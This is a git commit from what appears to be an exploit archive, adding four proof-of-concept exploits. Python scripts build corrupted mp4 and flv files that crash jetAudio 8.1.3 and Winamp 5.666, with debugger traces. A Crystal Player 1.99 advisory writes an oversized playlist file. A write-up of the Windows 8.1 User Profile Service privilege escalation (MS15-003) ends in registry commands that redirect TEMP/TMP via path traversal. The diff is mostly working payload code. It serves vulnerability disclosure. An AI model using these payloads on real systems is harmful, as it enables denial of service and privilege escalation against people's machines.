Update: 2015-01-25

4 new exploits
This commit is contained in:
Offensive Security 2015-01-25 08:35:56 +00:00
parent a04c22126e
commit de791d96e5
5 changed files with 245 additions and 0 deletions

View file

@ -32267,6 +32267,7 @@ id,file,description,date,author,platform,type,port
35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 'index.php' Cross Site Scripting Vulnerability",2011-05-31,"Stefan Schurtz",php,webapps,0
35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-05-31,Kalashinkov3,windows,remote,0
35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0
35811,platforms/windows/local/35811.txt,"Windows < 8.1 (32/64 bit) - Privilege Escalation (User Profile Service) (MS15-003)",2015-01-18,"Google Security Research",windows,local,0
35814,platforms/php/webapps/35814.txt,"TEDE Simplificado v1.01/vS2.04 Multiple SQL Injection Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0
@ -32278,6 +32279,8 @@ id,file,description,date,author,platform,type,port
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0
35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0
35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 'CKEditorFuncNum' Parameter Cross Site Scripting Vulnerability",2011-06-06,"AutoSec Tools",php,webapps,0
35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes 'test.php' Cross Site Scripting Vulnerability",2011-06-06,MustLive,php,webapps,0
35831,platforms/php/webapps/35831.txt,"PopScript 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0
@ -32311,6 +32314,7 @@ id,file,description,date,author,platform,type,port
35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0
35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0
35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0
35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption Vulnerability",2015-01-21,"Kapil Soni",windows,dos,0
35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0
35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0

Can't render this file because it is too large.

46
platforms/windows/dos/35827.py Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title : jetAudio 8.1.3 Basic Use-after-free (Corrupted mp4) Crash POC
# Product : jetAudio Basic
# Date : 12.12.2014
# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
# CVE : unknown at the moment
#============================================================================================
# Open created POC file (fault.mp4) with jetAudio
# Details
# (6e74.6e20): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
#JFDSPL!JPluginCreate+0x338f8:
#0a1a7588 8b11 mov edx,dword ptr [ecx] ds:002b:050aacf8=????????
#0:000:x86> kb
#ChildEBP RetAddr Args to Child
#WARNING: Stack unwind information not available. Following frames may be wrong.
#0018feec 72512466 00000000 00000000 00000000 JFDSPL!JPluginCreate+0x338f8
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for JetAudio.exe -
#0018ff00 005961ba 00000000 f9b7337c 00000000 MSVCR90!exit+0x11
#0018ff88 7558338a 7efde000 0018ffd4 771e9f72 JetAudio!CxIOFile::~CxIOFile+0x19414a
#0018ff94 771e9f72 7efde000 765bba31 00000000 kernel32!BaseThreadInitThunk+0xe
#0018ffd4 771e9f45 00596315 7efde000 00000000 ntdll32!__RtlUserThreadStart+0x70
#0018ffec 00000000 00596315 7efde000 00000000 ntdll32!_RtlUserThreadStart+0x1b
#0:000:x86> u 0a1a7588
#JFDSPL!JPluginCreate+0x338f8:
#0a1a7588 8b11 mov edx,dword ptr [ecx]
#0a1a758a 8b420c mov eax,dword ptr [edx+0Ch]
#0a1a758d 6a01 push 1
#0a1a758f 6870ff1d0a push offset JFDSPL!CxIOFile::~CxIOFile+0x303e0 (0a1dff70)
#0a1a7594 ffd0 call eax
#0a1a7596 6aff push 0FFFFFFFFh
#0a1a7598 6a00 push 0
#0a1a759a 8d8e043d0000 lea ecx,[esi+3D04h]
#============================================================================================
#!/usr/bin/python
pocdata=("\x00\x00\x00\xFA\x66\x74\x79\x70\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x00\x00\x00\x00\x6D\x70\x34\x32\x69\x73\x6F\x6D\x61\x76\x63\x31\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x6D\x70\x34\x32\x00\x00")
mp4file = "fault.mp4"
file = open(mp4file,"w")
file.write(pocdata)
file.close()

43
platforms/windows/dos/35828.py Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title : Winamp 5.666 build 3516 'f263.w5s' (Corrupted flv) Crash POC
# Product : Winamp 5.666 build 3516
# Date : 12.12.2014
# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link : http://winampplugins.co.uk/Winamp/
# Vulnerable version : Winamp 5.666 build 3516 (Latest at the moment) and probably previous versions
# Vendor Homepage : http://www.winamp.com/
# Tested on : Winamp 5.666 build 3516 installed on Windows 7 x64
# CVE : unknown at the moment
#============================================================================================
# Open created POC file (fault.flv) with Winamp
# Details
#(7714.ac58): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#f263!GetWinamp5SystemComponent+0x1951:
#08572f15 0fb601 movzx eax,byte ptr [ecx] ds:002b:e54d18b6=??
#0:021:x86> u eip
#f263!GetWinamp5SystemComponent+0x1951:
#08572f15 0fb601 movzx eax,byte ptr [ecx]
#08572f18 0fb67901 movzx edi,byte ptr [ecx+1]
#08572f1c c1e008 shl eax,8
#08572f1f 0bc7 or eax,edi
#08572f21 0fb67902 movzx edi,byte ptr [ecx+2]
#08572f25 0fb64903 movzx ecx,byte ptr [ecx+3]
#08572f29 c1e008 shl eax,8
#08572f2c 0bc7 or eax,edi
#!/usr/bin/python
flvheader=("\x46\x4C\x56\x01\xC5\x00\x00\x00\x09\x00\x00\x00\x00")
flvscripdatatag1 = ("\x12\x00\x02\x76\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0A\x6F\x6E\x4D\x65\x74\x61\x44\x61\x74\x61\x08\x00\x00\x00\x1C\x00\x0B\x68\x61\x73\x4D\x65\x74\x61\x64\x61\x74\x61\x01\x01\x00\x08\x68\x61\x73\x56\x69\x64\x65\x6F\x01\x01\x00\x08\x68\x61\x73\x41\x75\x64\x69\x6F\x01\x01\x00\x08\x64\x75\x72\x61\x74\x69\x6F\x6E\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0D\x6C\x61\x73\x74\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x15\x6C\x61\x73\x74\x6B\x65\x79\x66\x72\x61\x6D\x65\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x77\x69\x64\x74\x68\x00\x40\x89\x00\x00\x00\x00\x00\x00\x00\x06\x68\x65\x69\x67\x68\x74\x00\x40\x82\xC0\x00\x00\x00\x00\x00\x00\x0D\x76\x69\x64\x65\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\xBA\x2F\x4B\x7A\x6F\x4D\xEA\x00\x09\x66\x72\x61\x6D\x65\x72\x61\x74\x65\x00\x40\x35\xBD\x37\xA6\xF4\xDE\x9C\x00\x0D\x61\x75\x64\x69\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\x55\xDD\xD3\x7A\x6F\x4D\xEA\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x72\x61\x74\x65\x00\x40\xD5\x88\x80\x00\x00\x00\x00\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x73\x69\x7A\x65\x00\x40\x30\x00\x00\x00\x00\x00\x00\x00\x06\x73\x74\x65\x72\x65\x6F\x01\x00\x00\x08\x66\x69\x6C\x65\x73\x69\x7A\x65\x00\x40\xE3\xE1\x00\x00\x00\x00\x00\x00\x09\x76\x69\x64\x65\x6F\x73\x69\x7A\x65\x00\x40\xE3\x47\x20\x00\x00\x00\x00\x00\x09\x61\x75\x64\x69\x6F\x73\x69\x7A\x65\x00\x40\x80\x78\x00\x00\x00\x00\x00\x00\x08\x64\x61\x74\x61\x73\x69\x7A\x65\x00\x40\x85\x18\x00\x00\x00\x00\x00\x00\x0F\x6D\x65\x74\x61\x64\x61\x74\x61\x63\x72\x65\x61\x74\x6F\x72\x02\x00\x0D\x66\x6C\x76\x6D\x65\x74\x61\x20\x31\x2E\x31\x2E\x32\x00\x0C\x6D\x65\x74\x61\x64\x61\x74\x61\x64\x61\x74\x65\x0B\x42\x74\xAF\x38\x0D\x3D\x00\x00\x00\x00\x00\x0C\x61\x75\x64\x69\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x3F\xF0\x00\x00\x00\x00\x00\x00\x00\x0C\x76\x69\x64\x65\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x61\x75\x64\x69\x6F\x64\x65\x6C\x61\x79\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0C\x63\x61\x6E\x53\x65\x65\x6B\x54\x6F\x45\x6E\x64\x01\x01\x00\x0C\x68\x61\x73\x43\x75\x65\x50\x6F\x69\x6E\x74\x73\x01\x00\x00\x09\x63\x75\x65\x50\x6F\x69\x6E\x74\x73\x0A\x00\x00\x00\x00\x00\x0C\x68\x61\x73\x4B\x65\x79\x66\x72\x61\x6D\x65\x73\x01\x01\x00\x09\x6B\x65\x79\x66\x72\x61\x6D\x65\x73\x03\x00\x05\x74\x69\x6D\x65\x73\x0A\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x66\x69\x6C\x65\x70\x6F\x73\x69\x74\x69\x6F\x6E\x73\x0A\x00\x00\x00\x01\x00\x40\x85\xC0\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x09\x00\x00\x02\x81")
flvscripdatatag2 = ("\x12\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0C\x6F\x6E\x4C\x61\x73\x74\x53\x65\x63\x6F\x6E\x64\x08\x00\x00\x00\x00\x00\x00")
flvvideotag = ("\x09\x00\x00\x00\x22\x09\x00\x00\x9E\x00\x00\x00\x00\x00\x00\x00\x12\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x9A\x39")
flvaudiotag = ("\x08\x00\x02\x04\x00\x00\x2E\x00\x00\x00\x00\x1A\xBF\xB7\x12\x40\x01\x00\x30\xC2\x3B\x32\x00\xBA\xFD\x6A\x92\x88\x8C\x03\xA9\x38\x02\x89\xA9\x0B\xBD\xE8\x8C\x80\x23\x04\x2C\xE8\xBB\x30\x99\xA3\x2F\xA8\x02\x28\x11\xC2\x8F\x89\xA7\x19\x28\xB0\x99\x40\x40\xB8\x8F\xC1\x02\x41\x12\x08\xC8\x12\x70\x80\x88\x18\xA4\x61\x12\x08\x29\x11\xC2\x21\x3A\x80\x17\x33\x3B\x1A\xF8\x08\x80\x74\x80\x89\x80\xBA\x48\x96\x0B\xA8\x92\x32\x12\x70\x89\xA0\x8A\x25\x28\x82\x98\x3F\xB0\x01\x08\x89\x2E\x90\x90\x01\xBA\x79\xB9\x99\x47\x19\x01\x09\x9B\xBD\xA7\x20\x8A\x9B\x84\x98\x4A\xB4\x1D\xA9\x02\x50\x14\x1C\x81\x90\x29\x02\xAA\xD9\x9C\x12\xD8\x10\x1A\x37\x9A\x20\xDB\xB8\x1C\x13\x86\x28\x89\x13\x09\x9D\xB0\x01\x2A\xD8\xA2\x5C\xB9\x82\xCE\x12\x36\x0A\x99\x01\x82\x08\x02\x61\x93\x71\x08\xBB\x11\x10\x33\x27\x32\x19\x08\xA2\x11\x8F\x06\x99\x18\x81\xDB\x89\x0B\x93\x00\x19\x09\xF2\x3C\xA8\xD8\x08\x18\x17\x8B\x80\x9A\x3C\xF8\x00\x99\xBF\xA0\x08\x91\x8A\x29\x98\xF9\x40\xC9\x0C\x81\xBC\x90\x19\xA2\x59\xC8\x9A\x18\xE0\x08\x0C\xB2\x1B\x37\x00\x0B\x90\x01\x00\x41\xB8\x79\xB2\x9C\x53\x10\x8B\x50\x92\x39\xA0\x98\x73\x42\x43\xAA\x40\x81\x9A\x34\xA8\x53\x87\x48\xA9\xA8\x8A\x96\x10\x23\x19\x94\x00\x43\x88\x3B\x17\x00\x34\x00\x42\x8B\xC0\x10\x01\x89\x65\x89\x30\x24\xA0\x2F\xB2\x89\x88\x8B\xA4\x1C\x81\x93\x49\x99\xCC\xA0\xB8\x8F\xBA\xC2\x2C\x34\x92\x2D\xA2\x0A\x40\x91\x28\xAF\xC8\x03\x18\x29\xFB\x8A\x98\x22\x85\x2C\xAB\xB8\x89\x8C\xA1\x13\xA8\x4D\x87\x8C\x08\x93\x8A\x31\xC9\x19\x26\x88\x29\x22\xEA\x90\x72\x02\x99\x2A\xA1\x92\x79\x04\xAC\x21\x85\x8A\x20\x00\xA2\x11\x09\x44\xBD\xA8\x88\x1A\xB0\x8C\x91\x13\x29\xDB\x8B\xF8\xA9\x40\x61\xF9\x00\x99\x98\x00\x8C\xD8\x20\xB8\x0A\x11\xFC\x0A\xC9\x88\x09\x93\x3A\x01\x9A\xEA\xC0\x0F\x10\x02\x99\x3C\xC0\x9B\x38\xB7\x0B\x99\x99\xF8\x43\x09\x80\x99\x92\x22\x45\x19\x89\xDB\x02\x28\x10\xD0\x20\x12\xB1\xBD\x05\x10\x79\x05\x89\x10\x81\x0C\xB2\x80\x61\x98\x08\x30\xB6\x19\x44\x98\x3A\x98\x82\x18\x76\x09\x10\x91\xCC\x22\xA1\x3A\x09\x92\x9A\x49\xDB\xC8\x31\x12\xC1\x0D\x0A\x83\x01\x70\xA6\x8B\x3A\xA3\x9B\x40\x92\x80\x59\xB2\xAC\x8E\x91\xB9\x10\x20\xBF\x80\xA0\x93\x2C\x0B\x86\x0C\xB1\x41\x84\xA0\x00\x00\x02\x0F")
pocdata = [flvheader,flvscripdatatag1,flvscripdatatag2,flvvideotag,flvaudiotag]
flvfile = "fault.flv"
file = open(flvfile,"wb")
file.write(''.join(pocdata))
file.close()

114
platforms/windows/dos/35869.txt Executable file
View file

@ -0,0 +1,114 @@
Document Title:
===============
Crystal Player 1.99 - Memory Corruption Vulnerability
Date:
=============
21/01/2015
Vendor Homepage:
================
http://www.crystalreality.com/
Abstract Advisory Information:
==============================
Memory Corruption Vulnerability on Crystal Player 1.99.
Affected Product(s):
====================
Crystal Player 1.99
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A Memory Corruption Vulnerability is detected on Crystal Player 1.99. An attacker can crash the software by using .mls file.
Attackers can crash the software local by user inter action over mls (playlist).
--- DEBUG LOG ---
///registers
EAX 00000000
ECX 0006FE24
EDX 0006FE24
EBX 0013014C
ESP 0006F300
EBP 00060041
ESI 00FF4A00
EDI 00000001
EIP 0040F933 Crystal.0040F933
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 1 FS 003B 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00010296 (NO,NB,NE,A,S,PE,L,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
--- ERROR LOG ---
Crystal+0xf933:
0040f933 8b5510 mov edx,dword ptr [ebp+10h] ss:0023:00060051=????????
00060051 doesnt exist in the program aka not allowed .. so memcopy fails...
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0040f933 (Crystal+0xf933)
Access violation when reading [00060051]
Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by local attackers with userinteraction ...
#!/usr/bin/python
buffer = "A"*30000
filename = "Crash"+".mls"
file = open(filename, 'w')
file.write(buffer)
file.close()
print "[] Successfully MLS Created []"
How to perform:
=======================
1) Open Immunity Debugger and attach Crystal Player 1.99
2) Run it, Now move .mls file that we generated by our python script to the player
3) Once again you have to move the same file in Crystal Player 1.99 for adding second playlist.
When you perform above steps so application will crash. Analyze it on Immunity.
Solution - Fix & Patch:
=======================
Restrict working maximum size & set a own exception-handling for over-sized requests.
Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of the local crash method.
Authors:
==================
Kapil Soni (Haxinos)

View file

@ -0,0 +1,38 @@
## Source: https://code.google.com/p/google-security-research/issues/detail?id=123
Platform: Windows 8.1 Update 32/64 bit (No other OS tested)
When a user logs into a computer the User Profile Service is used to create certain directories and mount the user hives (as a normal user account cannot do so). In theory the only thing which needs to be done under a privileged account (other than loading the hives) is creating the base profile directory. This should be secure because c:\users requires administrator privileges to create. The configuration of the profile location is in HKLM so that cant be influenced.
However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the users token, but this changes to impersonating Local System part of the way through. Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs everytime the user logs in to their account, it isn't something that only happens during the initial provisioning of the local profile.
Some identified issues are:
* When creating directories the service does a recursive create, so for example if creating c:\users\user it will first create c:\users then c:\users\user. Probably not exploitable because Users already exists but of course worth remembering that normal users can create directories in the c: drive root. So always a possibility being able to place a junction point at c:\users on some systems.
* The service creates the temporary folder for the user in CreateTempDirectoryForUser and gets the value from the users hive Environment key (TEMP and TMP). This folder is created under system privileges. All it requires is the string starts with %USERPROFILE% so you can do relative paths or just replace USERPROFILE in the environment. This probably isn't that useful on the whole as the security of the directory is inherited from the parent.
* Creation of AppData\LocalLow folder in EnsurePreCreateKnownFolders. This might be exploited to set an arbitrary directorys integrity level to Low as it tries to set the label explicitly. But thats probably only of interest if theres a directory which a normal user would be able to write to but is blocked by a high/system integrity level which is unlikely.
* Probably most serious is the handling of the %USERPROFILE\AppData\Local\Microsoft\Windows\UsrClass.dat registry hive. The profile service queries for the location of AppData\Local from the users registry hive then tries to create the Windows folder and UsrClass.dat file. By creating a new folder structure, changing the user's shell folders registry key and placing a junction in the hierarchy you can get this process to open any other UsrClass.dat file on the system, assuming it isn't already loaded.
For example you could create a directory hierarchy like:
%USERPROFILE%\AppData\NotLocal\Microsoft\Windows -> c:\users\administrator\appdata\local\Microsoft\windows
Then set HKCU\Software\Microsoft\Windows\Explorer\User Shell Folders\Local AppData to %USERPROFILE%\AppData\NotLocal.
It seems to even set the root key security when it does so, this might be useful for privilege escalation. This has a chicken-and-egg problem in that the NtLoadKey system call will create the file if it doesn't exist (it sets the FILE_OPEN_IF disposition flag), but you must be running as an administrator otherwise the privilege check for SeRestorePrivilege will fail.
I've looked at the implementation on Windows 7 and there are a few similar issues but Windows 8.1 implementation of the services does a lot more things. At least the most serious UsrClass.dat issue exists in 7.
Attached is a batch file PoC for Windows 8.1 Update which demonstrates the temporary folder issue. To verify perform the following steps:
1) Execute the batch file as a normal user (this was tested with a local account, not a Microsoft online linked account, or domain). This will change the environment variables TEMP and TMP to be %USERPROFILE%\..\..\..\..\Windows\faketemp
2) Logout then log back in again
3) Observe that the directory \Windows\faketemp has been created.
reg add HKCU\Environment /v TEMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp
reg add HKCU\Environment /v TMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp